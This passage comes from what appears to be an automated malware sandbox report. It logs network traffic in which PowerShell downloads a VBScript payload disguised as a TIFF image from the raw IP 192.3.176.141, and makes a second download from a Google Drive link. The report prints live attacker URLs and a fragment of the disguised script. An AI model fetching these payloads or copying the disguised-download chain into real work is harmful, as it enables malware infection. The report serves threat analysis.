                                      Oct 25, 2024 10:33:19.739192009 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.739418030 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.739453077 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.739481926 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.739490032 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.739504099 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.739528894 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.739542961 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.739583969 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.740221024 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.740277052 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.740293980 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.740310907 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.740328074 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.740351915 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.743236065 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.743273973 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.743386984 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.743387938 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852417946 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852497101 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852535963 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852570057 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852606058 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852641106 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852641106 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852641106 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852641106 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852679014 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852715969 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852720976 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852720976 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852747917 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852752924 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852772951 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852798939 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852830887 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852838039 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852850914 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852885008 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.852940083 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.852974892 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853002071 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853010893 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853022099 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853068113 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853082895 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853137016 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853172064 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853257895 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853292942 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853287935 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853287935 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853287935 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853360891 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853514910 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853569031 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853621006 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853634119 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853676081 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853682041 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853712082 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853730917 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853746891 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853776932 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853784084 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853801966 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853821993 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853842020 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853857040 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853884935 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853898048 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.853914022 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.853956938 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.854794025 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.854851961 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.854892015 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.854928017 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.854935884 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.854937077 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.854964972 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.854965925 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.854984999 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855001926 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855007887 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855038881 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855072975 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855108023 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855110884 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855135918 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855150938 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855160952 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855218887 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855429888 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855540037 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855549097 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855576992 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855592966 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855612993 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855659962 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855669022 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855679989 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855705023 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855741978 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855761051 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855777979 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855802059 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855815887 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.855829954 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.855868101 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.858234882 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.858292103 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.858325958 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.858359098 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.967865944 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.967945099 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.967983007 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968018055 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968065977 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968111992 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968111992 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968127012 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968183041 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968219042 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968252897 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968286037 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968321085 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968327999 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968327999 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968327999 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968354940 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968389988 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968422890 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968456984 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968509912 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968529940 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968529940 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968529940 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968544006 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968580961 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968614101 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968647957 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968661070 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968682051 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968723059 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968729019 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968756914 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968765020 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968795061 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968827963 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968863010 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968892097 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968895912 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.968924999 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968960047 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.968995094 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.969028950 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.969042063 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.969080925 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.969090939 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.969116926 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.969147921 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.969151020 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.969185114 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.969188929 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.969271898 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:24.667486906 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:24.667572975 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:26.329065084 CEST49731443192.168.2.4216.58.206.78
                                      Oct 25, 2024 10:33:26.329150915 CEST44349731216.58.206.78192.168.2.4
                                      Oct 25, 2024 10:33:26.329236984 CEST49731443192.168.2.4216.58.206.78
                                      Oct 25, 2024 10:33:26.346410990 CEST49731443192.168.2.4216.58.206.78
                                      Oct 25, 2024 10:33:26.346465111 CEST44349731216.58.206.78192.168.2.4
                                      Oct 25, 2024 10:33:27.420504093 CEST44349731216.58.206.78192.168.2.4
                                      Oct 25, 2024 10:33:27.420725107 CEST49731443192.168.2.4216.58.206.78
                                      Oct 25, 2024 10:33:27.422027111 CEST44349731216.58.206.78192.168.2.4
                                      Oct 25, 2024 10:33:27.422230959 CEST49731443192.168.2.4216.58.206.78
                                      Oct 25, 2024 10:33:27.426177025 CEST49731443192.168.2.4216.58.206.78
                                      Oct 25, 2024 10:33:27.426208973 CEST44349731216.58.206.78192.168.2.4
                                      Oct 25, 2024 10:33:27.426640987 CEST44349731216.58.206.78192.168.2.4
                                      Oct 25, 2024 10:33:27.443989038 CEST49731443192.168.2.4216.58.206.78
                                      Oct 25, 2024 10:33:27.487366915 CEST44349731216.58.206.78192.168.2.4
                                      Oct 25, 2024 10:33:27.807105064 CEST44349731216.58.206.78192.168.2.4
                                      Oct 25, 2024 10:33:27.861414909 CEST49731443192.168.2.4216.58.206.78
                                      Oct 25, 2024 10:33:27.861476898 CEST44349731216.58.206.78192.168.2.4
                                      Oct 25, 2024 10:33:27.864659071 CEST49731443192.168.2.4216.58.206.78
                                      Oct 25, 2024 10:33:27.864996910 CEST44349731216.58.206.78192.168.2.4
                                      Oct 25, 2024 10:33:27.865190029 CEST49731443192.168.2.4216.58.206.78
                                      Oct 25, 2024 10:33:32.539819956 CEST4973080192.168.2.4192.3.176.141

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 25, 2024 10:33:26.315162897 CEST6016553192.168.2.41.1.1.1
                                      Oct 25, 2024 10:33:26.323637962 CEST53601651.1.1.1192.168.2.4
                                      Oct 25, 2024 10:33:27.866219997 CEST6160653192.168.2.41.1.1.1
                                      Oct 25, 2024 10:33:27.875649929 CEST53616061.1.1.1192.168.2.4
                                      Oct 25, 2024 10:33:46.373486042 CEST5354647162.159.36.2192.168.2.4
                                      Oct 25, 2024 10:33:47.000786066 CEST5075953192.168.2.41.1.1.1
                                      Oct 25, 2024 10:33:47.010055065 CEST53507591.1.1.1192.168.2.4
                                      Oct 25, 2024 10:33:49.949856043 CEST5748653192.168.2.41.1.1.1
                                      Oct 25, 2024 10:33:49.958441973 CEST53574861.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 25, 2024 10:33:26.315162897 CEST192.168.2.41.1.1.10xf404Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                      Oct 25, 2024 10:33:27.866219997 CEST192.168.2.41.1.1.10xbf63Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                      Oct 25, 2024 10:33:47.000786066 CEST192.168.2.41.1.1.10x8dfdStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                      Oct 25, 2024 10:33:49.949856043 CEST192.168.2.41.1.1.10xb8afStandard query (0)50.23.12.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 25, 2024 10:33:26.323637962 CEST1.1.1.1192.168.2.40xf404No error (0)drive.google.com216.58.206.78A (IP address)IN (0x0001)false
                                      Oct 25, 2024 10:33:27.875649929 CEST1.1.1.1192.168.2.40xbf63No error (0)drive.usercontent.google.com142.250.186.129A (IP address)IN (0x0001)false
                                      Oct 25, 2024 10:33:47.010055065 CEST1.1.1.1192.168.2.40x8dfdName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                      Oct 25, 2024 10:33:49.958441973 CEST1.1.1.1192.168.2.40xb8afName error (3)50.23.12.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • drive.google.com
                                      • 192.3.176.141

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449730192.3.176.141804432C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 25, 2024 10:33:18.965061903 CEST322OUTGET /36/goodthingswithgreatcomebackwithgreatthigns.tIF HTTP/1.1
                                      Accept: */*
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                      Host: 192.3.176.141
                                      Connection: Keep-Alive
                                      Oct 25, 2024 10:33:19.621716976 CEST1236INHTTP/1.1 200 OK
                                      Date: Fri, 25 Oct 2024 08:33:18 GMT
                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                      Last-Modified: Thu, 24 Oct 2024 00:28:17 GMT
                                      ETag: "22272-6252e1433ac91"
                                      Accept-Ranges: bytes
                                      Content-Length: 139890
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: image/tiff
                                      Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 65 00 73 00 74 00 61 00 6d 00 62 00 72 00 65 00 69 00 72 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64 00 6f 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 [TRUNCATED]
                                      Data Ascii: private function CreateSession(wsman, conStr, optDic, estambreiro) dim apoucadoFlags dim conOpt dim apoucado dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword apoucadoFlags = 0 proxyAccessTy
                                      Oct 25, 2024 10:33:19.621767998 CEST1236INData Raw: 00 70 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70
                                      Data Ascii: pe = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0 pr
                                      Oct 25, 2024 10:33:19.621804953 CEST1236INData Raw: 00 29 00 20 00 3d 00 20 00 22 00 75 00 74 00 66 00 2d 00 38 00 22 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64 00 6f 00 46 00 6c 00 61
                                      Data Ascii: ) = "utf-8" then apoucadoFlags = apoucadoFlags OR wsman.SessionFlagUTF8 else ' Invalid
                                      Oct 25, 2024 10:33:19.621838093 CEST636INData Raw: 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 53 00 53 00 4c 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74
                                      Data Ascii: PARA_USESSL) then ASSERTBOOL optDic.ArgumentExists(NPARA_REMOTE), "The '-" & NPARA_USESSL & "' option is onl
                                      Oct 25, 2024 10:33:19.621871948 CEST1236INData Raw: 00 41 00 5f 00 41 00 55 00 54 00 48 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 20 00 3d 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e
                                      Data Ascii: A_AUTH) authVal = optDic.Argument(NPARA_AUTH) select case LCase(authVal) case VAL_NO_AUTH
                                      Oct 25, 2024 10:33:19.621907949 CEST1236INData Raw: 00 6e 00 6f 00 6e 00 65 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 56 00 41 00 4c 00 5f 00 42 00 41 00 53 00 49 00 43 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20
                                      Data Ascii: none'" case VAL_BASIC 'Use -username and -password. ASSERTBOOL optDic.Ar
                                      Oct 25, 2024 10:33:19.621942997 CEST1236INData Raw: 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20
                                      Data Ascii: ), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:digest'" ASSERTBOOL not optDic.Arg
                                      Oct 25, 2024 10:33:19.621977091 CEST1236INData Raw: 00 6e 00 46 00 6c 00 61 00 67 00 55 00 73 00 65 00 4b 00 65 00 72 00 62 00 65 00 72 00 6f 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 56 00 41 00 4c 00 5f 00 4e 00 45
                                      Data Ascii: nFlagUseKerberos case VAL_NEGOTIATE '-username and -password are optional.
                                      Oct 25, 2024 10:33:19.622011900 CEST1236INData Raw: 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45
                                      Data Ascii: TBOOL not optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option is not valid for '-auth:certificat
                                      Oct 25, 2024 10:33:19.622050047 CEST1060INData Raw: 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45
                                      Data Ascii: sts(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:credssp'" ASSERT
                                      Oct 25, 2024 10:33:19.628006935 CEST1236INData Raw: 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52
                                      Data Ascii: if optDic.ArgumentExists(NPARA_USERNAME) then ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" &


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449731216.58.206.784437592C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-25 08:33:27 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                      Host: drive.google.com
                                      Connection: Keep-Alive
                                      2024-10-25 08:33:27 UTC1319INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Fri, 25 Oct 2024 08:33:27 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2ihvnRvp4TqG9SWBhcP0_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Cross-Origin-Opener-Policy: same-origin
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:04:33:12
